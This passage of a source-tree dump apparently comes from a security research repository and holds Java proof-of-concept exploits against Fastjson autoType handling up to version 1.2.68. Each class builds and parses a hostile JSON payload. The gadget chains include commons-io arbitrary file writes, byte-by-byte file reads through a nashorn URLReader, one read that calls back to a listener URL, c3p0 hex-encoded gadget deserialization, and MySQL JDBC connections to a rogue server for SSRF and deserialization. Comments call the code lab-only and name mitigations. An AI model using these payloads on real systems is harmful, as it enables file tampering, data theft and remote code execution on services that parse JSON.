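 * {@code encoding} on the writer, and an explicit {@code start}/{@code end}
 * range on the CharSequenceReader.
 */
public class Fastjson06_io_write_2 {
    public static void main(String[] args) throws Exception {
        //<=1.2.68 and commons-io-2.7/2.8
        // Pad past 8 KiB so the buffered content actually spills into the file;
        // built in one step instead of 8200 string concatenations.
        String code = "test" + new String(new char[8200]).replace('\0', 'a');
        // body of each trigger; identical for trigger, trigger2 and trigger3
        String trigger = " \"@type\":\"java.lang.AutoCloseable\",\r\n"
                + " \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
                + " \"inputStream\":{\r\n"
                + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
                + " \"input\":{\r\n"
                + " \"$ref\":\"$.input\"\r\n"
                + " },\r\n"
                + " \"branch\":{\r\n"
                + " \"$ref\":\"$.branch\"\r\n"
                + " },\r\n"
                + " \"closeBranch\": true\r\n"
                + " },\r\n"
                + " \"httpContentType\":\"text/xml\",\r\n"
                + " \"lenient\":false,\r\n"
                + " \"defaultEncoding\":\"UTF-8\"\r\n";
        String payload = "{\r\n"
                + " \"x\":{\r\n"
                + " \"@type\":\"com.alibaba.fastjson.JSONObject\",\r\n"
                + " \"input\":{\r\n"
                + " \"@type\":\"java.lang.AutoCloseable\",\r\n"
                + " \"@type\":\"org.apache.commons.io.input.ReaderInputStream\",\r\n"
                + " \"reader\":{\r\n"
                + " \"@type\":\"org.apache.commons.io.input.CharSequenceReader\",\r\n"
                + " \"charSequence\":{\"@type\":\"java.lang.String\"\""+code+"\",\r\n"
                + " \"start\":0,\r\n"
                + " \"end\":2147483647\r\n"
                + " },\r\n"
                + " \"charsetName\":\"UTF-8\",\r\n"
                + " \"bufferSize\":1024\r\n"
                + " },\r\n"
                + " \"branch\":{\r\n"
                + " \"@type\":\"java.lang.AutoCloseable\",\r\n"
                + " \"@type\":\"org.apache.commons.io.output.WriterOutputStream\",\r\n"
                + " \"writer\":{\r\n"
                + " \"@type\":\"org.apache.commons.io.output.FileWriterWithEncoding\",\r\n"
                + " \"file\":\"1.txt\",\r\n"
                + " \"charsetName\":\"UTF-8\",\r\n"
                + " \"append\": false\r\n"
                + " },\r\n"
                + " \"charsetName\":\"UTF-8\",\r\n"
                + " \"bufferSize\": 1024,\r\n"
                + " \"writeImmediately\": true\r\n"
                + " },\r\n"
                + " \"trigger\":{\r\n"
                + trigger
                + " },\r\n"
                + " \"trigger2\":{\r\n"
                + trigger
                + " },\r\n"
                + " \"trigger3\":{\r\n"
                + trigger
                + " }\r\n"
                + " }\r\n"
                + "}";
        System.out.println(payload);
        JSON.parse(payload);
    }
}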
97 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson07_io_write_3.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import org.apache.commons.io.FileUtils;
5 | import java.io.File;
6 | import java.io.IOException;
7 |
/**
 * Generator for the Fastjson 1.2.68 AutoCloseable + commons-io <= 2.4 file-write PoC.
 *
 * Builds the same CharSequenceInputStream -> TeeInputStream -> WriterOutputStream
 * -> FileWriterWithEncoding chain as Fastjson05/06, but drives the read with a
 * BOMInputStream whose getBOM() is triggered through java.util.Currency /
 * JSONObject getter invocation, and can emit either a plain or a $ref-based
 * payload. The padding and BOM-length arithmetic is tuned to the 8192-byte
 * buffers involved; change it only together with the target commons-io version.
 *
 * @author su18
 */
public class Fastjson07_io_write_3 {
    //<=1.2.68 and commons-io
    /** Leading tag that makes Fastjson accept any AutoCloseable implementor as the expected type. */
    public static final String AUTOCLOSEABLE_TAG = "\"@type\":\"java.lang.AutoCloseable\",";
    /**
     * Wraps the payload in one more object level so that a parse call with an
     * explicit expected type does not apply that type to the payload itself.
     *
     * @param payload payload
     * @return the wrapped payload
     */
    public static String bypassSpecializedClass(String payload) {
        return "{\"su18\":" + payload + "}";
    }
    /**
     * Parsing as java.util.Currency calls toString() on the value under "currency";
     * for a JSONObject that is toJSONString(), which invokes every getter (and so
     * getBOM() on the BOMInputStream inside).
     *
     * @param payload payload
     * @param ref     true when the payload is an object graph that references
     *                itself via "$.currency.*" and must not be wrapped again
     * @return the Currency-wrapped payload
     */
    public static String useCurrencyTriggerAllGetter(String payload, boolean ref) {
        return String.format("{\"@type\":\"java.util.Currency\",\"val\":{\"currency\":%s%s}}%s",
                (ref ? "" : "{\"su19\":"), payload, (ref ? "" : "}"));
    }


    /**
     * Builds the CharSequenceInputStream fragment carrying the content to write.
     * The content is padded with spaces up to the next multiple of 8192 plus one
     * character so that it crosses the 8 KiB buffer boundary and is actually
     * flushed through to the writer.
     *
     * @param content content to write
     * @param ref     whether to prefix the AutoCloseable tag (reference style)
     * @return the JSON fragment
     */
    public static String generateCharSequenceInputStream(String content, boolean ref) {
        int mod = 8192 - content.length() % 8192;

        StringBuilder contentBuilder = new StringBuilder(content);
        for (int i = 0; i < mod+1; i++) {
            contentBuilder.append(" ");
        }

        return String.format("{%s\"@type\":\"org.apache.commons.io.input.CharSequenceInputStream\"," +
                "\"charset\":\"UTF-8\",\"bufferSize\":4,\"s\":{\"@type\":\"java.lang.String\"\"%s\"}",
                ref ? AUTOCLOSEABLE_TAG : "", contentBuilder);
    }


    /**
     * Builds the FileWriterWithEncoding fragment (the file sink).
     *
     * @param filePath path of the file to write on the target
     * @param ref      whether to prefix the AutoCloseable tag (reference style)
     * @return the JSON fragment
     */
    public static String generateFileWriterWithEncoding(String filePath, boolean ref) {
        return String.format("{%s\"@type\":\"org.apache.commons.io.output.FileWriterWithEncoding\"," +
                "\"file\":\"%s\",\"encoding\":\"UTF-8\"}", ref ? AUTOCLOSEABLE_TAG : "", filePath);
    }

    /**
     * Builds the WriterOutputStream fragment that adapts the writer to a byte sink.
     *
     * @param writer JSON fragment of the writer object
     * @param ref    whether to prefix the AutoCloseable tag (reference style)
     * @return the JSON fragment
     */
    public static String generateWriterOutputStream(String writer, boolean ref) {
        return String.format("{%s\"@type\":\"org.apache.commons.io.output.WriterOutputStream\",\"writeImmediately\":true," +
                "\"bufferSize\":4,\"charsetName\":\"UTF-8\",\"writer\":%s}",
                ref ? AUTOCLOSEABLE_TAG : "", writer);
    }


    /**
     * Builds the TeeInputStream fragment that copies everything read from
     * {@code inputStream} into {@code outputStream}.
     *
     * @param inputStream  JSON fragment of the input stream
     * @param outputStream JSON fragment of the output stream (branch)
     * @param ref          whether to prefix the AutoCloseable tag (reference style)
     * @return the JSON fragment
     */
    public static String generateTeeInputStream(String inputStream, String outputStream, boolean ref) {
        return String.format("{%s\"@type\":\"org.apache.commons.io.input.TeeInputStream\",\"input\":%s," +
                "\"closeBranch\":true,\"branch\":%s}", ref ? AUTOCLOSEABLE_TAG : "", inputStream, outputStream);
    }


    /**
     * Builds the BOMInputStream fragment that performs the read. A ByteOrderMark of
     * N zero bytes makes getBOM() read N bytes from the delegate; N is {@code size}
     * rounded up to a multiple of 8192, plus one, so the whole padded content
     * passes through the tee. Always carries the AutoCloseable tag.
     *
     * @param inputStream JSON fragment of the delegate stream
     * @param size        number of bytes to pull through
     * @return the JSON fragment
     */
    public static String generateBOMInputStream(String inputStream, int size) {

        int nums = size / 8192;
        int mod = size % 8192;

        if (mod != 0) {
            nums = nums + 1;
        }

        StringBuilder bytes = new StringBuilder("0");
        for (int i = 0; i < nums * 8192; i++) {
            bytes.append(",0");
        }
        return String.format("{%s\"@type\":\"org.apache.commons.io.input.BOMInputStream\",\"delegate\":%s," +
                "\"boms\":[{\"charsetName\":\"UTF-8\",\"bytes\":[%s]}]}",
                AUTOCLOSEABLE_TAG, inputStream, bytes);
    }


    /**
     * Reads a file into a string (platform default charset, via commons-io).
     * NOTE(review): on IOException the trace is printed and "" is returned, which
     * generatePayload/generateRefPayload then turn into an empty payload.
     *
     * @param file file to read
     * @return the file content, or "" when it could not be read
     */
    public static String readFile(File file) {
        String result = "";

        try {
            result = FileUtils.readFileToString(file);
        } catch (IOException e) {
            e.printStackTrace();
        }

        return result;
    }


    /**
     * Builds the plain (non-reference) payload: every object is inlined.
     *
     * @param payloadFile    local file whose content becomes the written data
     * @param targetFilePath path on the target where that content is written
     * @return the payload, or "" when the local file is empty or unreadable
     */
    public static String generatePayload(String payloadFile, String targetFilePath) {
        File file = new File(payloadFile);
        String fileContent = readFile(file);
        if (!"".equals(fileContent)) {
            return bypassSpecializedClass(
                    useCurrencyTriggerAllGetter(
                            generateBOMInputStream(
                                    generateTeeInputStream(generateCharSequenceInputStream(fileContent, false),
                                            generateWriterOutputStream(
                                                    generateFileWriterWithEncoding(targetFilePath, false),
                                                    false),
                                            false),
                                    (int) file.length()),
                            false));
        }

        return "";
    }

    /**
     * Builds the reference-style payload: each stream is a named sibling under
     * "currency" and later ones point at earlier ones via "$.currency.*" $refs.
     *
     * @param payloadFile    local file whose content becomes the written data
     * @param targetFilePath path on the target where that content is written
     * @return the payload, or "" when the local file is empty or unreadable
     */
    public static String generateRefPayload(String payloadFile, String targetFilePath) {
        File file = new File(payloadFile);
        String fileContent = readFile(file);
        if (!"".equals(fileContent)) {
            return bypassSpecializedClass(
                    useCurrencyTriggerAllGetter(
                            "{\"writer\":" + generateFileWriterWithEncoding(targetFilePath, true) +
                                    ",\"outputStream\":" + generateWriterOutputStream("{\"$ref\":\"$.currency.writer\"}", true) +
                                    ",\"charInputStream\":" + generateCharSequenceInputStream(fileContent, true) +
                                    ",\"teeInputStream\":" + generateTeeInputStream("{\"$ref\":\"$.currency.charInputStream\"}", "{\"$ref\":\"$.currency.outputStream\"}", true) +
                                    ",\"inputStream\":" + generateBOMInputStream("{\"$ref\":\"$.currency.teeInputStream\"}", (int) file.length()) + "}"
                            , true
                    )
            );
        }

        return "";

    }


    /**
     * Demo entry point: copies the content of local 1.txt into 2.txt on the
     * parsing side using the reference-style payload.
     */
    public static void main(String[] args) {
        String file = "1.txt";
        String target = "2.txt";

        // plain payload (generated for reference; NOTE(review): never printed or parsed)
        String payload = generatePayload(file, target);

        // reference-style payload
        String payloadWithRef = generateRefPayload(file, target);
        System.out.println(payloadWithRef);
        // all three call forms below trigger the deserialization chain
        // JSON.parse(payloadWithRef);
        JSON.parseObject(payloadWithRef);
        // JSON.parseObject(payloadWithRef,POC.class);
    }

}
214 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson08_io_write_4.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
import java.io.InputStream;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Arrays;
import java.util.Base64;

import com.alibaba.fastjson.JSON;
7 |
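/**
 * Fastjson <= 1.2.68 binary-safe file write.
 *
 * The Base64 text of the local file is the source (CharSequenceInputStream); a
 * commons-codec Base64InputStream decodes it on the fly; a TeeInputStream copies
 * the decoded bytes into an Eclipse SafeFileOutputStream (from aspectjtools)
 * pointed at {@code ./1.txt}. The outer BOMInputStream is given a ByteOrderMark
 * as long as the Base64 text, so the {@code $.bOM} $ref (getBOM()) pulls that
 * many bytes through the tee. Unlike the earlier io chains this survives
 * arbitrary byte content, but the data still has to exceed 8 KiB to be flushed.
 */
public class Fastjson08_io_write_4 {
    public static void main(String[] args) throws Exception {
        //<=1.2.68 and commons-io-2.2 aspectjtools-1.9.6 commons-codec-1.6
        // This chain exists because io chains 1-3 cannot write complex/binary file
        // content; the file still has to be larger than 8 KiB to be written.
        //
        // Read the whole local file and close it. The original opened
        // new URL("file://1.txt") and used available()+read(): that may short-read
        // and never closed the stream, and the two-slash form puts "1.txt" in the
        // URL's host part rather than its path, which the JDK handler does not
        // treat as a local file.
        byte[] bs = Files.readAllBytes(Paths.get("1.txt"));
        String test = Base64.getEncoder().encodeToString(bs);
        byte[] testbs = test.getBytes();
        String payload = "{\r\n"
                + " \"@type\":\"java.lang.AutoCloseable\",\r\n"
                + " \"@type\":\"org.apache.commons.io.input.BOMInputStream\",\r\n"
                + " \"delegate\":{\r\n"
                + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
                + " \"input\":{\r\n"
                + " \"@type\": \"org.apache.commons.codec.binary.Base64InputStream\",\r\n"
                + " \"in\":{\r\n"
                + " \"@type\":\"org.apache.commons.io.input.CharSequenceInputStream\",\r\n"
                + " \"charset\":\"utf-8\",\r\n"
                + " \"bufferSize\": 1024,\r\n"
                + " \"s\":{\"@type\":\"java.lang.String\"\""+test+"\"\r\n"
                + " },\r\n"
                + " \"doEncode\":false,\r\n"
                + " \"lineLength\":1024,\r\n"
                + " \"lineSeparator\":\"5ZWKCg==\",\r\n"
                + " \"decodingPolicy\":0\r\n"
                + " },\r\n"
                + " \"branch\":{\r\n"
                + " \"@type\":\"org.eclipse.core.internal.localstore.SafeFileOutputStream\",\r\n"
                + " \"targetPath\":\"./1.txt\"\r\n"
                + " },\r\n"
                + " \"closeBranch\":true\r\n"
                + " },\r\n"
                + " \"include\":true,\r\n"
                + " \"boms\":[{\r\n"
                + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
                + " \"charsetName\": \"UTF-8\",\r\n"
                + " \"bytes\":"+Arrays.toString(testbs)+"\r\n"
                + " }],\r\n"
                + " \"x\":{\"$ref\":\"$.bOM\"}\r\n"
                + "}\r\n"
                + "";

        System.out.println(payload);
        JSON.parseObject(payload);

    }
}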
57 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson09_io_read.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import java.io.InputStream;
4 | import java.net.URL;
5 | import java.util.Arrays;
6 | import com.alibaba.fastjson.JSON;
7 |
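/**
 * fastjson (<= 1.2.68) "AutoCloseable" autoType-bypass PoC: byte-oracle file read via
 * commons-io BOMInputStream over a nashorn URLReader. Lab use only.
 *
 * <p>The document makes the parsing host open {@code url} (anything the JDK URL handlers
 * accept - here a local drive listing) and compare its first bytes against the "boms"
 * candidates ({@code [36]} = '$', {@code [49]} = '1'). The {@code $ref} to {@code $.abc.BOM}
 * presumably invokes the BOM getter, and the parse result that main() prints shows which
 * candidate matched; repeating with other candidates recovers the content prefix by prefix.
 *
 * <p>NOTE(review): the defence is on the parsing side - disable autoType (fastjson safeMode)
 * or upgrade fastjson; egress filtering only helps for the remote-URL variants.
 */
public class Fastjson09_io_read {

    /** URL the target is made to read; a CLI argument overrides it. */
    private static final String DEFAULT_TARGET_URL = "file:///D:/";

    /**
     * Dumps the local view of the target URL, then prints and parses the exploit document.
     *
     * @param args optional: args[0] is the URL to read (defaults to {@link #DEFAULT_TARGET_URL})
     * @throws Exception on I/O failure or when the parse throws
     */
    public static void main(String[] args) throws Exception {
        // Affected: fastjson <= 1.2.68 with commons-io on the classpath.
        String url = args.length > 0 ? args[0] : DEFAULT_TARGET_URL;
        // Diagnostic only: show what the target would read so the "bytes" candidates can be chosen.
        // The original leaked the stream and used available()+read(), which can come back short.
        byte[] bs;
        try (InputStream input = new URL(url).openStream()) {
            bs = readFully(input);
        }
        System.out.println(Arrays.toString(bs));
        System.out.println(new String(bs));
        String payload = buildPayload(url);
        System.out.println(payload);
        // Exploit step: the printed parse result reveals which BOM candidate matched.
        System.out.println(JSON.parseObject(payload));
    }

    /**
     * Drains {@code in} to end-of-stream.
     *
     * @param in stream to read; it is not closed here
     * @return every byte the stream produced (empty array for an empty stream)
     * @throws java.io.IOException if reading fails
     */
    static byte[] readFully(InputStream in) throws java.io.IOException {
        byte[] chunk = new byte[8192];
        byte[] out = new byte[0];
        int n;
        while ((n = in.read(chunk)) != -1) {
            int used = out.length;
            out = Arrays.copyOf(out, used + n);
            System.arraycopy(chunk, 0, out, used, n);
        }
        return out;
    }

    /**
     * Builds the exploit document. {@code url} is spliced in unescaped, exactly as the original
     * did - a quote or backslash in it would break the JSON.
     *
     * @param url the URL the target is made to open
     * @return the exploit JSON
     */
    static String buildPayload(String url) {
        return "{\r\n"
            + " \"abc\": {\r\n"
            + " \"@type\": \"java.lang.AutoCloseable\",\r\n"
            + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
            + " \"delegate\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
            + " \"reader\": {\r\n"
            + " \"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
            + " \"url\": \"" + url + "\"\r\n"
            + " },\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bufferSize\": 1024\r\n"
            + " },\r\n"
            + " \"boms\": [{\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bytes\": [36]\r\n"
            + " },{\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bytes\": [49]\r\n"
            + " }]\r\n"
            + " },\r\n"
            + " \"address\": {\r\n"
            + " \"$ref\": \"$.abc.BOM\"\r\n"
            + " }\r\n"
            + "}";
    }
}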
46 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson10_io_read_error_dnslog.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import java.io.InputStream;
4 | import java.net.URL;
5 | import java.util.Arrays;
6 |
7 | import com.alibaba.fastjson.JSON;
8 |
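/**
 * fastjson (<= 1.2.68) "AutoCloseable" autoType-bypass PoC: blind (error / callback oracle)
 * file read via commons-io BOMInputStream over a nashorn URLReader. Lab use only.
 *
 * <p>"abc" makes the target read {@code url} and test its first byte against the single "boms"
 * candidate; "address" wraps {@code $.abc.BOM[0]} in a CharSequenceReader, and "xxx"/"zzz" open
 * a second URLReader to the callback URL. Presumably the callback only fires (or the parse only
 * fails) when the candidate byte matched, so a hit on the listener - or the error that comes
 * back - leaks one byte per request; confirm the exact trigger against the gadget write-up.
 * Unlike the read_print variant nothing from the parse result is printed.
 *
 * <p>NOTE(review): mitigation is disabling autoType (fastjson safeMode) or upgrading fastjson;
 * blocking egress to the callback host only removes the out-of-band channel.
 */
public class Fastjson10_io_read_error_dnslog {

    /** URL the target is made to read; args[0] overrides it. */
    private static final String DEFAULT_TARGET_URL = "file:///D://";
    /** Listener the target calls back to; args[1] overrides it. */
    private static final String DEFAULT_CALLBACK_URL = "http://127.0.0.1:5667/";

    /**
     * Dumps the local view of the target URL, then prints and parses the exploit document.
     *
     * @param args optional: args[0] target URL, args[1] callback URL
     * @throws Exception on I/O failure or when the parse throws
     */
    public static void main(String[] args) throws Exception {
        // Affected: fastjson <= 1.2.68 with commons-io on the classpath.
        String url = args.length > 0 ? args[0] : DEFAULT_TARGET_URL;
        String callback = args.length > 1 ? args[1] : DEFAULT_CALLBACK_URL;
        // Diagnostic only: show what the target would read so the "bytes" candidate can be chosen.
        // The original leaked the stream and used available()+read(), which can come back short.
        byte[] bs;
        try (InputStream input = new URL(url).openStream()) {
            bs = readFully(input);
        }
        System.out.println(Arrays.toString(bs));
        System.out.println(new String(bs));
        // The original repeated the file URL literally inside the document; both now come from `url`.
        String payload = buildPayload(url, callback);
        System.out.println(payload);
        // Exploit step: parse the hostile document with a vulnerable fastjson.
        JSON.parseObject(payload);
    }

    /**
     * Drains {@code in} to end-of-stream.
     *
     * @param in stream to read; it is not closed here
     * @return every byte the stream produced (empty array for an empty stream)
     * @throws java.io.IOException if reading fails
     */
    static byte[] readFully(InputStream in) throws java.io.IOException {
        byte[] chunk = new byte[8192];
        byte[] out = new byte[0];
        int n;
        while ((n = in.read(chunk)) != -1) {
            int used = out.length;
            out = Arrays.copyOf(out, used + n);
            System.arraycopy(chunk, 0, out, used, n);
        }
        return out;
    }

    /**
     * Builds the exploit document. Both URLs are spliced in unescaped, as in the original; a
     * quote or backslash in either would break the JSON.
     *
     * @param url      URL the target is made to read
     * @param callback URL the target is made to request as the oracle channel
     * @return the exploit JSON (ends with CRLF)
     */
    static String buildPayload(String url, String callback) {
        return "{\r\n"
            + " \"abc\":{\"@type\": \"java.lang.AutoCloseable\",\r\n"
            + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
            + " \"delegate\": {\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
            + " \"reader\": { \"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
            + " \"url\": \"" + url + "\"\r\n"
            + " },\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bufferSize\": 1024\r\n"
            + " },\"boms\": [\r\n"
            + " {\r\n"
            + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bytes\": [37]\r\n"
            + " }\r\n"
            + " ]\r\n"
            + " },\r\n"
            + " \"address\" : {\"@type\": \"java.lang.AutoCloseable\",\"@type\":\"org.apache.commons.io.input.CharSequenceReader\",\r\n"
            + " \"charSequence\": {\"@type\": \"java.lang.String\"{\"$ref\":\"$.abc.BOM[0]\"},\"start\": 0,\"end\": 0},\r\n"
            + " \"xxx\": {\r\n"
            + " \"@type\": \"java.lang.AutoCloseable\",\r\n"
            + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
            + " \"delegate\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
            + " \"reader\": {\r\n"
            + " \"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
            + " \"url\": \"" + callback + "\"\r\n"
            + " },\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bufferSize\": 1024\r\n"
            + " },\r\n"
            + " \"boms\": [{\"@type\": \"org.apache.commons.io.ByteOrderMark\", \"charsetName\": \"UTF-8\", \"bytes\": [1]}]\r\n"
            + " },\r\n"
            + " \"zzz\":{\"$ref\":\"$.xxx.BOM[0]\"}\r\n"
            + "}\r\n"
            + "";
    }
}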
58 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson11_C3P0.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 | import java.io.*;
3 | import com.alibaba.fastjson.JSON;
4 |
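/**
 * fastjson PoC riding c3p0's {@code WrapperConnectionPoolDataSource}: its
 * {@code userOverridesAsString} setter accepts a {@code HexAsciiSerializedMap:<hex>;} value and
 * Java-deserializes the hex bytes - the "second-stage deserialization" the original notes refer
 * to, which turns a fastjson autoType hit on that class into native ObjectInputStream exposure.
 * The blob is a ready-made gadget (e.g. ysoserial output) read from disk. Lab use only.
 *
 * <p>The commented-out variant below is the pre-1.2.48 form, which first names the class via
 * {@code java.lang.Class}/{@code val} - presumably to get it cached past the autoType check -
 * and then instantiates it.
 */
public class Fastjson11_C3P0 {

    /** Default path of the serialized gadget; a CLI argument overrides it. */
    private static final String DEFAULT_SER_PATH = "D:\\Downloads\\workspace\\javareadobject\\1.ser";

    /**
     * Reads the serialized gadget, wraps it in the c3p0 document, prints and parses it.
     *
     * @param args optional: args[0] is the .ser file path (defaults to {@link #DEFAULT_SER_PATH})
     * @throws Exception on I/O failure or when the parse throws
     */
    public static void main(String[] args) throws Exception{
        String serPath = args.length > 0 ? args[0] : DEFAULT_SER_PATH;
        byte[] payload;
        // toByteArray() closes the stream itself; the try-with-resources covers the failure path.
        try (InputStream in = new FileInputStream(serPath)) {
            payload = toByteArray(in);
        }
        String payloadHex = bytesToHex(payload, payload.length);
        // c3p0 second-stage deserialization.
        String poc = "{\r\n"
            + " \"@type\": \"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\", \r\n"
            + " \"userOverridesAsString\": \"HexAsciiSerializedMap:"+payloadHex+";\"\r\n"
            + "}";
        // fastjson < 1.2.48 variant with the java.lang.Class priming step.
        // poc = "{\r\n"
        // + " \"a\": {\r\n"
        // + " \"@type\": \"java.lang.Class\", \r\n"
        // + " \"val\": \"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\"\r\n"
        // + " }, \r\n"
        // + " \"b\": {\r\n"
        // + " \"@type\": \"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\", \r\n"
        // + " \"userOverridesAsString\": \"HexAsciiSerializedMap:"+payloadHex+";\"\r\n"
        // + " }\r\n"
        // + "}";
        System.out.println(poc);
        // Exploit step: parse the hostile document with a vulnerable fastjson.
        JSON.parseObject(poc);
    }

    /**
     * Reads {@code in} to end-of-stream and closes it. Replaces the original
     * {@code available()} + single {@code read()}, which is not guaranteed to return the whole
     * file (available() is only an estimate and read() may be short).
     *
     * @param in stream to drain; always closed on return
     * @return all bytes read (empty array for an empty stream)
     * @throws IOException if reading fails
     */
    public static byte[] toByteArray(InputStream in) throws IOException {
        try (InputStream src = in; ByteArrayOutputStream out = new ByteArrayOutputStream()) {
            byte[] buf = new byte[8192];
            int n;
            while ((n = src.read(buf)) != -1) {
                out.write(buf, 0, n);
            }
            return out.toByteArray();
        }
    }

    /**
     * Renders the first {@code length} bytes of {@code bArray} as upper-case hex, two digits per
     * byte, with no separators.
     *
     * @param bArray bytes to encode; {@code null} yields ""
     * @param length number of leading bytes to encode; clamped to the array length
     * @return the hex string (2 * min(length, bArray.length) characters)
     */
    public static String bytesToHex(byte[] bArray, int length) {
        if (bArray == null) {
            return "";
        }
        int count = Math.min(length, bArray.length);
        // StringBuilder instead of the synchronized StringBuffer; two characters per byte.
        StringBuilder sb = new StringBuilder(Math.max(count, 0) * 2);
        for (int i = 0; i < count; ++i) {
            String sTemp = Integer.toHexString(255 & bArray[i]);
            if (sTemp.length() < 2) {
                sb.append(0);
            }
            sb.append(sTemp.toUpperCase());
        }
        return sb.toString();
    }
}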
49 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson12_mysql_1.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
/**
 * fastjson (<= 1.2.68) "AutoCloseable" autoType-bypass PoC against mysql-connector-java
 * 5.0.2-5.1.5: instantiating {@code com.mysql.jdbc.ReplicationConnection} with attacker-chosen
 * master/slave properties makes the parsing host connect out to {@code HOST}. The original author
 * notes this driver range yields SSRF only. The {@code autoDeserialize} /
 * {@code statementInterceptors} properties and the {@code yso_CommonsCollections4_calc} user are
 * presumably the convention of a rogue MySQL server that picks a ysoserial gadget by username;
 * they matter for the driver versions that do deserialize (see the mysql_2..mysql_4 PoCs).
 * Lab use only.
 *
 * <p>NOTE(review): mitigation is disabling autoType (fastjson safeMode) or upgrading fastjson;
 * egress filtering from the parsing host also breaks this chain.
 */
public class Fastjson12_mysql_1 {
    // Affected: fastjson <= 1.2.68 with mysql-connector-java 5.0.2-5.1.5 -> SSRF only.
    public static void main(String[] args) throws Exception{
        String payload = "{\r\n"
            + " \"@type\": \"java.lang.AutoCloseable\",\r\n"
            + " \"@type\": \"com.mysql.jdbc.ReplicationConnection\",\r\n"
            + " \"masterProperties\": {\r\n"
            + " \"HOST\": \"127.0.0.1\",\r\n"
            + " \"user\": \"yso_CommonsCollections4_calc\",\r\n"
            + " \"password\": \"pass\",\r\n"
            + " \"statementInterceptors\": \"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\r\n"
            + " \"autoDeserialize\": \"true\"\r\n"
            + " },\r\n"
            + " \"slaveProperties\": {\r\n"
            + " \"HOST\": \"127.0.0.1\",\r\n"
            + " \"user\": \"yso_CommonsCollections4_calc\",\r\n"
            + " \"password\": \"pass\",\r\n"
            + " \"statementInterceptors\": \"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\r\n"
            + " \"autoDeserialize\": \"true\"\r\n"
            + " }\r\n"
            + "}\r\n"
            + "";
        System.out.println(payload);
        // Exploit step: parse the hostile document with a vulnerable fastjson.
        JSON.parseObject(payload);
    }
}
31 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson13_mysql_2.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
/**
 * fastjson (<= 1.2.68) "AutoCloseable" autoType-bypass PoC against mysql-connector-java 5.1.x:
 * instantiating {@code com.mysql.jdbc.JDBC4Connection} with attacker-chosen host/port/properties
 * makes the parsing host connect out. Per the original note, 5.1.1-5.1.49 gives SSRF and
 * 5.1.11-5.1.48 additionally deserializes what the server returns, which is what
 * {@code autoDeserialize} plus the {@code ServerStatusDiffInterceptor} set up; the
 * {@code yso_CommonsCollections4_calc} user presumably selects the gadget on a rogue MySQL
 * server. Lab use only.
 *
 * <p>NOTE(review): mitigation is disabling autoType (fastjson safeMode) or upgrading fastjson;
 * egress filtering from the parsing host also breaks this chain.
 */
public class Fastjson13_mysql_2 {
    // Affected: fastjson <= 1.2.68; mysql-connector-java 5.1.1-5.1.49 -> SSRF, 5.1.11-5.1.48 -> deserialization.
    public static void main(String[] args) throws Exception{
        String payload = "{\r\n"
            + " \"@type\": \"java.lang.AutoCloseable\",\r\n"
            + " \"@type\": \"com.mysql.jdbc.JDBC4Connection\",\r\n"
            + " \"hostToConnectTo\": \"127.0.0.1\",\r\n"
            + " \"portToConnectTo\": 3306,\r\n"
            + " \"info\": {\r\n"
            + " \"user\": \"yso_CommonsCollections4_calc\",\r\n"
            + " \"password\": \"pass\",\r\n"
            + " \"statementInterceptors\": \"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\r\n"
            + " \"autoDeserialize\": \"true\",\r\n"
            + " \"NUM_HOSTS\": \"1\"\r\n"
            + " },\r\n"
            + " \"databaseToConnectTo\": \"dbname\",\r\n"
            + " \"url\": \"\"\r\n"
            + "}\r\n"
            + "";
        System.out.println(payload);
        // Exploit step: parse the hostile document with a vulnerable fastjson.
        JSON.parseObject(payload);
    }
}
28 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson14_mysql_3.java:
